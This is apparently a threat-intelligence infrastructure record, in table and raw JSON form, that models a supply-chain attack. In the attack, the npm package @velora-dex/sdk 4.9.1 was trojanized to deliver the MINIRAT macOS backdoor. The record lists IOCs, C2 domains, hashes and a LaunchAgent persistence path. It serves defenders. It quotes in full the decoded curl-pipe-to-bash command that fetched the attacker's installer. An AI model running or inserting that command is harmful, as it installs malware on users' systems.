wiz.2026.jinx-0164-velora-sdk-minirat-supply-chain
JINX-0164 trojanized @velora-dex/sdk to MINIRAT macOS C2 chain
IIM chain for the Wiz Research report published on 2026-05-27 describing JINX-0164 supply-chain activity. The chain models trojanized npm package @velora-dex/sdk version 4.9.1, a malicious dist/index.js addition that decodes and runs a curl command to 89.36.224.5/troubleshoot/mac/install.sh, dropper delivery, MINIRAT macOS payload execution, and the shared datahub.ink / cloud-sync.online / byte-io.us C2 domain set. It intentionally does not invent npm account credentials, unpublished package download telemetry beyond Wiz/StepSecurity references, or a source-repository compromise because Wiz explicitly says the GitHub source code was not modified.
Infrastructure map
Role-based chain map
Chain storyline
ordered IIM positionsurl
https://www.npmjs.com/package/@velora-dex/sdk/v/4.9.1
file
@velora-dex/sdk dist/index.js malicious appended exec block
url
http://89.36.224.5/troubleshoot/mac/install.sh
ip
89.36.224.5
hash
c6ef82d2864dfd26f117a1ef5602679153423f2742970a7949cec72722f0a01e
hash
2a10ffe0367bb1b26ba2c3bc600892c21074725c0b8c9dc9161e6ceb33915460
hash
0a8ab3d16b12d3a453ee5a3208fe04744ad54514ef8ea27bb8fe32679efad270
hash
0b028b781950641818800fee2b4bf68e4ef2bcee53fe71a21755275ba108783d
hash
a35d2b67fa478a7174e308b43ce30bf69b3bc6f44fa76197fdf95fc2fbc1cf5b
file
~/Library/LaunchAgents/com.apple.Terminal.profiler.plist
domain
datahub.ink
domain
cloud-sync.online
domain
byte-io.us
ip
208.115.220.17
ip
185.175.59.85
Relations
directed infrastructure edgese001dropse002
confirmed
e002downloade003
confirmed
e003resolves-toe004
confirmed
e003referencese005
confirmed
e003referencese006
confirmed
e005dropse007
likely
e005dropse008
likely
e006dropse007
likely
e006dropse008
likely
e007dropse010
confirmed
e008dropse010
confirmed
e007connecte011
confirmed
e007connecte012
confirmed
e007connecte013
confirmed
e011resolves-toe014
confirmed
e011resolves-toe015
confirmed
e009connecte011
confirmed
Entities & evidence
observable inventory| ID | Type | Value | Source / evidence |
|---|---|---|---|
e001 |
url | https://www.npmjs.com/package/@velora-dex/sdk/v/4.9.1 |
Wiz states JINX-0164 trojanized version 4.9.1 of the npm package @velora-dex/sdk on April 7, 2026. Wiz states Velora is a DEX aggregation protocol and the SDK was an attractive cryptocurrency-industry target. Wiz states the GitHub source code was not modified, suggesting access was limited to npm credentials. |
e002 |
file | @velora-dex/sdk dist/index.js malicious appended exec block |
Wiz states the malicious package appended three lines to dist/index.js. Wiz publishes the JavaScript exec block that base64-decodes and runs a shell command. The decoded command downloads install.sh from http://89.36.224.5/troubleshoot/mac/install.sh. |
e003 |
url | http://89.36.224.5/troubleshoot/mac/install.sh |
Wiz publishes the decoded command: nohup bash -c "$(curl -fsSL http://89.36.224.5/troubleshoot/mac/install.sh)". Wiz lists two dropper hashes delivered via supply chain from 89.36.224.5. Wiz states the shell script structure is similar to scripts used to deliver AUDIOFIX but does not display terminal output. |
e004 |
ip | 89.36.224.5 |
Wiz publishes 89.36.224.5 in the decoded @velora-dex/sdk command. Wiz lists 89.36.224.5 in payload delivery domains for driver-store.com and in supply-chain dropper rows. Modeled as staging infrastructure for the supply-chain installer URL. |
e005 |
hash | c6ef82d2864dfd26f117a1ef5602679153423f2742970a7949cec72722f0a01e |
Wiz lists this SHA-256 as Dropper Delivered via supply chain (89.36.224.5). This hash is modeled as one of the install.sh/dropper artifacts associated with the supply-chain operation. |
e006 |
hash | 2a10ffe0367bb1b26ba2c3bc600892c21074725c0b8c9dc9161e6ceb33915460 |
Wiz lists this SHA-256 as Dropper Delivered via supply chain (89.36.224.5). This hash is modeled as another dropper artifact associated with the supply-chain operation. |
e007 |
hash | 0a8ab3d16b12d3a453ee5a3208fe04744ad54514ef8ea27bb8fe32679efad270 |
Wiz lists this SHA-256 as MINIRAT ARM64. Wiz describes MINIRAT as a lightweight Go backdoor with versions for x86 and ARM. Wiz states MINIRAT performs basic reconnaissance, sets persistence, and supports shell command execution, file upload/download, and compression/upload functionality. |
e008 |
hash | 0b028b781950641818800fee2b4bf68e4ef2bcee53fe71a21755275ba108783d |
Wiz lists this SHA-256 as MINIRAT x86_64. Wiz describes MINIRAT as a lightweight Go backdoor with versions for x86 and ARM. Wiz states MINIRAT uses the same AES key and the same three C&C domains as AUDIOFIX. |
e009 |
hash | a35d2b67fa478a7174e308b43ce30bf69b3bc6f44fa76197fdf95fc2fbc1cf5b |
Wiz lists this SHA-256 as MINIRAT ARM64. Wiz states a slightly modified MINIRAT version was uploaded to VirusTotal on May 8, 2026, indicating continued use in additional operations. |
e010 |
file | ~/Library/LaunchAgents/com.apple.Terminal.profiler.plist |
Wiz states MINIRAT sets persistence by writing a plist under ~/Library/LaunchAgents/ with the label com.apple.Terminal.profiler. The plist is modeled as host persistence created by the payload. |
e011 |
domain | datahub.ink |
Wiz states MINIRAT uses the same three C&C domains as AUDIOFIX. Wiz lists datahub.ink as the primary C&C domain and provides two resolved IPs. Wiz states at publication only the primary domain had been identified resolving. |
e012 |
domain | cloud-sync.online |
Wiz lists cloud-sync.online as a hard-coded backup C2 domain used by MINIRAT and AUDIOFIX. The IOC table lists no resolved IP for this domain at publication. |
e013 |
domain | byte-io.us |
Wiz lists byte-io.us as a hard-coded backup C2 domain used by MINIRAT and AUDIOFIX. The IOC table lists no resolved IP for this domain at publication. |
e014 |
ip | 208.115.220.17 |
Wiz lists datahub.ink resolving to 208.115.220.17. This IP is modeled only as a resolved target for the primary C2 domain. |
e015 |
ip | 185.175.59.85 |
Wiz lists datahub.ink resolving to 185.175.59.85. This IP is modeled only as a resolved target for the primary C2 domain. |
ATT&CK annotations
optional complementary mappingTrojanized @velora-dex/sdk package version 4.9.1 on npm.
Decoded npm payload runs curl-fetched shell script.
MINIRAT LaunchAgent persistence under ~/Library/LaunchAgents.
Raw IIM JSON canonical body from MANTIS expand
{
"iim_version": "1.1",
"chain_id": "wiz.2026.jinx-0164-velora-sdk-minirat-supply-chain",
"title": "JINX-0164 trojanized @velora-dex/sdk to MINIRAT macOS C2 chain",
"description": "IIM chain for the Wiz Research report published on 2026-05-27 describing JINX-0164 supply-chain activity. The chain models trojanized npm package @velora-dex/sdk version 4.9.1, a malicious dist/index.js addition that decodes and runs a curl command to 89.36.224.5/troubleshoot/mac/install.sh, dropper delivery, MINIRAT macOS payload execution, and the shared datahub.ink / cloud-sync.online / byte-io.us C2 domain set. It intentionally does not invent npm account credentials, unpublished package download telemetry beyond Wiz/StepSecurity references, or a source-repository compromise because Wiz explicitly says the GitHub source code was not modified.",
"actor_id": "JINX-0164",
"observed_at": "2026-05-27T00:00:00Z",
"confidence": "confirmed",
"needs_review": false,
"import_source": "manual-osint-report-to-iim-conversion",
"entities": [
{
"id": "e001",
"type": "url",
"value": "https://www.npmjs.com/package/@velora-dex/sdk/v/4.9.1",
"observed_at": "2026-04-07T00:00:00Z",
"source": "Wiz: Commit to Compromise: A New Threat Actor Targeting the Cryptocurrency Industry's Software Development Infrastructure (2026-05-27)",
"evidence": [
"Wiz states JINX-0164 trojanized version 4.9.1 of the npm package @velora-dex/sdk on April 7, 2026.",
"Wiz states Velora is a DEX aggregation protocol and the SDK was an attractive cryptocurrency-industry target.",
"Wiz states the GitHub source code was not modified, suggesting access was limited to npm credentials."
],
"x_reference_url": "https://www.wiz.io/blog/threat-actors-target-crypto-orgs",
"x_package_name": "@velora-dex/sdk",
"x_package_version": "4.9.1",
"x_ecosystem": "npm",
"x_exact_ioc_published": true
},
{
"id": "e002",
"type": "file",
"value": "@velora-dex/sdk dist/index.js malicious appended exec block",
"observed_at": "2026-04-07T00:00:00Z",
"source": "Wiz: Commit to Compromise: A New Threat Actor Targeting the Cryptocurrency Industry's Software Development Infrastructure (2026-05-27)",
"evidence": [
"Wiz states the malicious package appended three lines to dist/index.js.",
"Wiz publishes the JavaScript exec block that base64-decodes and runs a shell command.",
"The decoded command downloads install.sh from http://89.36.224.5/troubleshoot/mac/install.sh."
],
"x_reference_url": "https://www.wiz.io/blog/threat-actors-target-crypto-orgs",
"x_exact_ioc_published": true
},
{
"id": "e003",
"type": "url",
"value": "http://89.36.224.5/troubleshoot/mac/install.sh",
"observed_at": "2026-04-07T00:00:00Z",
"source": "Wiz: Commit to Compromise: A New Threat Actor Targeting the Cryptocurrency Industry's Software Development Infrastructure (2026-05-27)",
"evidence": [
"Wiz publishes the decoded command: nohup bash -c \"$(curl -fsSL http://89.36.224.5/troubleshoot/mac/install.sh)\".",
"Wiz lists two dropper hashes delivered via supply chain from 89.36.224.5.",
"Wiz states the shell script structure is similar to scripts used to deliver AUDIOFIX but does not display terminal output."
],
"x_reference_url": "https://www.wiz.io/blog/threat-actors-target-crypto-orgs",
"x_defanged_value": "http://89.36.224[.]5/troubleshoot/mac/install.sh",
"x_exact_ioc_published": true
},
{
"id": "e004",
"type": "ip",
"value": "89.36.224.5",
"observed_at": "2026-04-07T00:00:00Z",
"source": "Wiz: Commit to Compromise: A New Threat Actor Targeting the Cryptocurrency Industry's Software Development Infrastructure (2026-05-27)",
"evidence": [
"Wiz publishes 89.36.224.5 in the decoded @velora-dex/sdk command.",
"Wiz lists 89.36.224.5 in payload delivery domains for driver-store.com and in supply-chain dropper rows.",
"Modeled as staging infrastructure for the supply-chain installer URL."
],
"x_reference_url": "https://www.wiz.io/blog/threat-actors-target-crypto-orgs",
"x_exact_ioc_published": true
},
{
"id": "e005",
"type": "hash",
"value": "c6ef82d2864dfd26f117a1ef5602679153423f2742970a7949cec72722f0a01e",
"observed_at": "2026-04-07T00:00:00Z",
"source": "Wiz: Commit to Compromise: A New Threat Actor Targeting the Cryptocurrency Industry's Software Development Infrastructure (2026-05-27)",
"evidence": [
"Wiz lists this SHA-256 as Dropper Delivered via supply chain (89.36.224.5).",
"This hash is modeled as one of the install.sh/dropper artifacts associated with the supply-chain operation."
],
"x_reference_url": "https://www.wiz.io/blog/threat-actors-target-crypto-orgs",
"x_malware_family": "JINX-0164 supply-chain dropper",
"x_exact_ioc_published": true
},
{
"id": "e006",
"type": "hash",
"value": "2a10ffe0367bb1b26ba2c3bc600892c21074725c0b8c9dc9161e6ceb33915460",
"observed_at": "2026-04-07T00:00:00Z",
"source": "Wiz: Commit to Compromise: A New Threat Actor Targeting the Cryptocurrency Industry's Software Development Infrastructure (2026-05-27)",
"evidence": [
"Wiz lists this SHA-256 as Dropper Delivered via supply chain (89.36.224.5).",
"This hash is modeled as another dropper artifact associated with the supply-chain operation."
],
"x_reference_url": "https://www.wiz.io/blog/threat-actors-target-crypto-orgs",
"x_malware_family": "JINX-0164 supply-chain dropper",
"x_exact_ioc_published": true
},
{
"id": "e007",
"type": "hash",
"value": "0a8ab3d16b12d3a453ee5a3208fe04744ad54514ef8ea27bb8fe32679efad270",
"observed_at": "2026-04-07T00:00:00Z",
"source": "Wiz: Commit to Compromise: A New Threat Actor Targeting the Cryptocurrency Industry's Software Development Infrastructure (2026-05-27)",
"evidence": [
"Wiz lists this SHA-256 as MINIRAT ARM64.",
"Wiz describes MINIRAT as a lightweight Go backdoor with versions for x86 and ARM.",
"Wiz states MINIRAT performs basic reconnaissance, sets persistence, and supports shell command execution, file upload/download, and compression/upload functionality."
],
"x_reference_url": "https://www.wiz.io/blog/threat-actors-target-crypto-orgs",
"x_malware_family": "MINIRAT",
"x_architecture": "arm64",
"x_exact_ioc_published": true
},
{
"id": "e008",
"type": "hash",
"value": "0b028b781950641818800fee2b4bf68e4ef2bcee53fe71a21755275ba108783d",
"observed_at": "2026-04-07T00:00:00Z",
"source": "Wiz: Commit to Compromise: A New Threat Actor Targeting the Cryptocurrency Industry's Software Development Infrastructure (2026-05-27)",
"evidence": [
"Wiz lists this SHA-256 as MINIRAT x86_64.",
"Wiz describes MINIRAT as a lightweight Go backdoor with versions for x86 and ARM.",
"Wiz states MINIRAT uses the same AES key and the same three C&C domains as AUDIOFIX."
],
"x_reference_url": "https://www.wiz.io/blog/threat-actors-target-crypto-orgs",
"x_malware_family": "MINIRAT",
"x_architecture": "x86_64",
"x_exact_ioc_published": true
},
{
"id": "e009",
"type": "hash",
"value": "a35d2b67fa478a7174e308b43ce30bf69b3bc6f44fa76197fdf95fc2fbc1cf5b",
"observed_at": "2026-05-08T00:00:00Z",
"source": "Wiz: Commit to Compromise: A New Threat Actor Targeting the Cryptocurrency Industry's Software Development Infrastructure (2026-05-27)",
"evidence": [
"Wiz lists this SHA-256 as MINIRAT ARM64.",
"Wiz states a slightly modified MINIRAT version was uploaded to VirusTotal on May 8, 2026, indicating continued use in additional operations."
],
"x_reference_url": "https://www.wiz.io/blog/threat-actors-target-crypto-orgs",
"x_malware_family": "MINIRAT",
"x_architecture": "arm64",
"x_exact_ioc_published": true
},
{
"id": "e010",
"type": "file",
"value": "~/Library/LaunchAgents/com.apple.Terminal.profiler.plist",
"observed_at": "2026-04-07T00:00:00Z",
"source": "Wiz: Commit to Compromise: A New Threat Actor Targeting the Cryptocurrency Industry's Software Development Infrastructure (2026-05-27)",
"evidence": [
"Wiz states MINIRAT sets persistence by writing a plist under ~/Library/LaunchAgents/ with the label com.apple.Terminal.profiler.",
"The plist is modeled as host persistence created by the payload."
],
"x_reference_url": "https://www.wiz.io/blog/threat-actors-target-crypto-orgs",
"x_exact_ioc_published": true
},
{
"id": "e011",
"type": "domain",
"value": "datahub.ink",
"observed_at": "2026-04-07T00:00:00Z",
"source": "Wiz: Commit to Compromise: A New Threat Actor Targeting the Cryptocurrency Industry's Software Development Infrastructure (2026-05-27)",
"evidence": [
"Wiz states MINIRAT uses the same three C&C domains as AUDIOFIX.",
"Wiz lists datahub.ink as the primary C&C domain and provides two resolved IPs.",
"Wiz states at publication only the primary domain had been identified resolving."
],
"x_reference_url": "https://www.wiz.io/blog/threat-actors-target-crypto-orgs",
"x_exact_ioc_published": true
},
{
"id": "e012",
"type": "domain",
"value": "cloud-sync.online",
"observed_at": "2026-04-07T00:00:00Z",
"source": "Wiz: Commit to Compromise: A New Threat Actor Targeting the Cryptocurrency Industry's Software Development Infrastructure (2026-05-27)",
"evidence": [
"Wiz lists cloud-sync.online as a hard-coded backup C2 domain used by MINIRAT and AUDIOFIX.",
"The IOC table lists no resolved IP for this domain at publication."
],
"x_reference_url": "https://www.wiz.io/blog/threat-actors-target-crypto-orgs",
"x_exact_ioc_published": true
},
{
"id": "e013",
"type": "domain",
"value": "byte-io.us",
"observed_at": "2026-04-07T00:00:00Z",
"source": "Wiz: Commit to Compromise: A New Threat Actor Targeting the Cryptocurrency Industry's Software Development Infrastructure (2026-05-27)",
"evidence": [
"Wiz lists byte-io.us as a hard-coded backup C2 domain used by MINIRAT and AUDIOFIX.",
"The IOC table lists no resolved IP for this domain at publication."
],
"x_reference_url": "https://www.wiz.io/blog/threat-actors-target-crypto-orgs",
"x_exact_ioc_published": true
},
{
"id": "e014",
"type": "ip",
"value": "208.115.220.17",
"observed_at": "2026-04-07T00:00:00Z",
"source": "Wiz: Commit to Compromise: A New Threat Actor Targeting the Cryptocurrency Industry's Software Development Infrastructure (2026-05-27)",
"evidence": [
"Wiz lists datahub.ink resolving to 208.115.220.17.",
"This IP is modeled only as a resolved target for the primary C2 domain."
],
"x_reference_url": "https://www.wiz.io/blog/threat-actors-target-crypto-orgs",
"x_exact_ioc_published": true
},
{
"id": "e015",
"type": "ip",
"value": "185.175.59.85",
"observed_at": "2026-04-07T00:00:00Z",
"source": "Wiz: Commit to Compromise: A New Threat Actor Targeting the Cryptocurrency Industry's Software Development Infrastructure (2026-05-27)",
"evidence": [
"Wiz lists datahub.ink resolving to 185.175.59.85.",
"This IP is modeled only as a resolved target for the primary C2 domain."
],
"x_reference_url": "https://www.wiz.io/blog/threat-actors-target-crypto-orgs",
"x_exact_ioc_published": true
}
],
"chain": [
{
"entity_id": "e001",
"role": "entry",
"techniques": [
"IIM-T006"
],
"role_confidence": "confirmed"
},
{
"entity_id": "e002",
"role": "entry",
"techniques": [],
"role_confidence": "confirmed"
},
{
"entity_id": "e003",
"role": "staging",
"techniques": [
"IIM-T002"
],
"role_confidence": "confirmed"
},
{
"entity_id": "e004",
"role": "staging",
"techniques": [
"IIM-T002"
],
"role_confidence": "confirmed"
},
{
"entity_id": "e005",
"role": "staging",
"techniques": [],
"role_confidence": "confirmed"
},
{
"entity_id": "e006",
"role": "staging",
"techniques": [],
"role_confidence": "confirmed"
},
{
"entity_id": "e007",
"role": "payload",
"techniques": [],
"role_confidence": "confirmed"
},
{
"entity_id": "e008",
"role": "payload",
"techniques": [],
"role_confidence": "confirmed"
},
{
"entity_id": "e009",
"role": "payload",
"techniques": [],
"role_confidence": "confirmed"
},
{
"entity_id": "e010",
"role": "staging",
"techniques": [],
"role_confidence": "confirmed"
},
{
"entity_id": "e011",
"role": "c2",
"techniques": [
"IIM-T011"
],
"role_confidence": "confirmed"
},
{
"entity_id": "e012",
"role": "c2",
"techniques": [
"IIM-T011"
],
"role_confidence": "confirmed"
},
{
"entity_id": "e013",
"role": "c2",
"techniques": [
"IIM-T011"
],
"role_confidence": "confirmed"
},
{
"entity_id": "e014",
"role": "c2",
"techniques": [],
"role_confidence": "confirmed"
},
{
"entity_id": "e015",
"role": "c2",
"techniques": [],
"role_confidence": "confirmed"
}
],
"relations": [
{
"from": "e001",
"to": "e002",
"type": "drops",
"sequence_order": 1,
"confidence": "confirmed",
"x_evidence": [
"Wiz states version 4.9.1 appended three malicious lines to dist/index.js."
]
},
{
"from": "e002",
"to": "e003",
"type": "download",
"sequence_order": 2,
"confidence": "confirmed",
"x_evidence": [
"Wiz publishes the decoded curl command to http://89.36.224.5/troubleshoot/mac/install.sh."
]
},
{
"from": "e003",
"to": "e004",
"type": "resolves-to",
"sequence_order": 3,
"confidence": "confirmed",
"x_evidence": [
"The installer URL directly uses IP 89.36.224.5 as the host."
]
},
{
"from": "e003",
"to": "e005",
"type": "references",
"sequence_order": 4,
"confidence": "confirmed",
"x_evidence": [
"Wiz lists c6ef... as Dropper Delivered via supply chain (89.36.224.5)."
]
},
{
"from": "e003",
"to": "e006",
"type": "references",
"sequence_order": 5,
"confidence": "confirmed",
"x_evidence": [
"Wiz lists 2a10... as Dropper Delivered via supply chain (89.36.224.5)."
]
},
{
"from": "e005",
"to": "e007",
"type": "drops",
"sequence_order": 6,
"confidence": "likely",
"x_evidence": [
"Wiz states the shell script downloads MINIRAT; exact per-dropper hash-to-MINIRAT hash mapping is not published in a table."
]
},
{
"from": "e005",
"to": "e008",
"type": "drops",
"sequence_order": 7,
"confidence": "likely",
"x_evidence": [
"Wiz states MINIRAT supports ARM and x86; exact per-dropper hash-to-payload hash mapping is not published."
]
},
{
"from": "e006",
"to": "e007",
"type": "drops",
"sequence_order": 8,
"confidence": "likely",
"x_evidence": [
"Wiz states the supply-chain shell script downloads MINIRAT; exact per-dropper mapping is not published."
]
},
{
"from": "e006",
"to": "e008",
"type": "drops",
"sequence_order": 9,
"confidence": "likely",
"x_evidence": [
"Wiz states MINIRAT supports ARM and x86; exact per-dropper mapping is not published."
]
},
{
"from": "e007",
"to": "e010",
"type": "drops",
"sequence_order": 10,
"confidence": "confirmed",
"x_evidence": [
"Wiz states MINIRAT writes a LaunchAgents plist with label com.apple.Terminal.profiler."
]
},
{
"from": "e008",
"to": "e010",
"type": "drops",
"sequence_order": 11,
"confidence": "confirmed",
"x_evidence": [
"Wiz states MINIRAT writes a LaunchAgents plist with label com.apple.Terminal.profiler."
]
},
{
"from": "e007",
"to": "e011",
"type": "connect",
"sequence_order": 12,
"confidence": "confirmed",
"x_evidence": [
"Wiz states MINIRAT uses datahub.ink, cloud-sync.online and byte-io.us as C2 domains."
]
},
{
"from": "e007",
"to": "e012",
"type": "connect",
"sequence_order": 13,
"confidence": "confirmed",
"x_evidence": [
"Wiz states MINIRAT uses the same three C2 domains as AUDIOFIX."
]
},
{
"from": "e007",
"to": "e013",
"type": "connect",
"sequence_order": 14,
"confidence": "confirmed",
"x_evidence": [
"Wiz states MINIRAT uses the same three C2 domains as AUDIOFIX."
]
},
{
"from": "e011",
"to": "e014",
"type": "resolves-to",
"sequence_order": 15,
"confidence": "confirmed",
"x_evidence": [
"Wiz lists datahub.ink resolving to 208.115.220.17."
]
},
{
"from": "e011",
"to": "e015",
"type": "resolves-to",
"sequence_order": 16,
"confidence": "confirmed",
"x_evidence": [
"Wiz lists datahub.ink resolving to 185.175.59.85."
]
},
{
"from": "e009",
"to": "e011",
"type": "connect",
"sequence_order": 17,
"confidence": "confirmed",
"x_evidence": [
"Wiz states the slightly modified May 8 MINIRAT version uses the same C2 domains."
]
}
],
"attack_annotations": [
{
"technique_id": "T1195.002",
"name": "Supply Chain Compromise: Compromise Software Supply Chain",
"tactic": "Initial Access",
"comment": "Trojanized @velora-dex/sdk package version 4.9.1 on npm."
},
{
"technique_id": "T1059.004",
"name": "Command and Scripting Interpreter: Unix Shell",
"tactic": "Execution",
"comment": "Decoded npm payload runs curl-fetched shell script."
},
{
"technique_id": "T1543.001",
"name": "Create or Modify System Process: Launch Agent",
"tactic": "Persistence",
"comment": "MINIRAT LaunchAgent persistence under ~/Library/LaunchAgents."
}
],
"x_publication_date": "2026-05-27",
"x_source_url": "https://www.wiz.io/blog/threat-actors-target-crypto-orgs",
"x_source_title": "Wiz: Commit to Compromise: A New Threat Actor Targeting the Cryptocurrency Industry's Software Development Infrastructure (2026-05-27)",
"x_modeling_notes": [
"Wiz explicitly states the GitHub source code was not modified; the entry is therefore the npm package, not the upstream repository.",
"Exact npm account compromise details are not published and are not modeled as IoCs.",
"MINIRAT hash-to-installer mapping is not fully published, so dropper-to-payload relations are marked likely."
]
}